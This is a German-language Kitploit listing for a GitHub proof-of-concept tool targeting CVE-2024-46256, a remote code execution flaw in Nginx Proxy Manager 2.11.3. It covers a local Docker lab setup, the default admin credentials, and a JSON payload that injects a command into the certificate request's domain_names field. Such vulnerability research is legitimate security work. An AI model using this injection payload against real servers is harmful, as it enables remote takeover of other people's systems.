Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46256 — CVE-2024-46256 Werkzeug | Kitploit
Tools/GitHubGitHub/kimtangker/cve-2024-46256
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

CVE-2024-46256 Werkzeug

Repository anzeigen
8vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46256 Nginx Proxy Manager RCE Schwachstellenanalyse

Umgebungsaufbau

1. Ausführung der Nginx Proxy Manager 2.11.3 Umgebung

root@kitploit:~

docker-compose up -d

Oder Sie können das automatische Skript verwenden:

root@kitploit:~

python setup_environment.py

2. Zugriff auf den Nginx Proxy Manager

  • URL: http://localhost:81

  • Nach Abschluss der Ersteinrichtung den Test durchführen

  • Mit dem Standard-Administratorkonto anmelden (E-Mail: [email protected] / Passwort: changeme)

  • Zugriffsrechte für die Zertifikatsausstellungsfunktionen überprüfen

Schwachstelleninformationen

  • CVE ID: CVE-2024-46256

  • Produkt: Nginx Proxy Manager

  • Version: 2.11.3

Tool herunterladen
  • Schwachstellentyp: Remote Code Execution (RCE)

  • CVSS: Hoch

  • PoC-Code

    Der PoC führt dazu, dass ein authentifizierter Benutzer während des Zertifikatsausstellungsprozesses (z.B. Let's Encrypt) im Feld für den Domainnamen eine Template-/Befehlsinjektion durchführt und so eine RCE auslöst.

    Beispiel-Payload (konzeptionelles Beispiel):

    root@kitploit:~
    {
      "domain_names": ["test.com\"||{command}||\\n test.com\""],
      "meta": {
        "dns_challenge": false,
        "letsencrypt_agree": true,
        "letsencrypt_email": "[email protected]"
      },
      "provider": "letsencrypt"
    }
    

    Analyseumgebung

    • Betriebssystem: Windows 10

    • Docker: Aktuelle Version

    • Nginx Proxy Manager: 2.11.3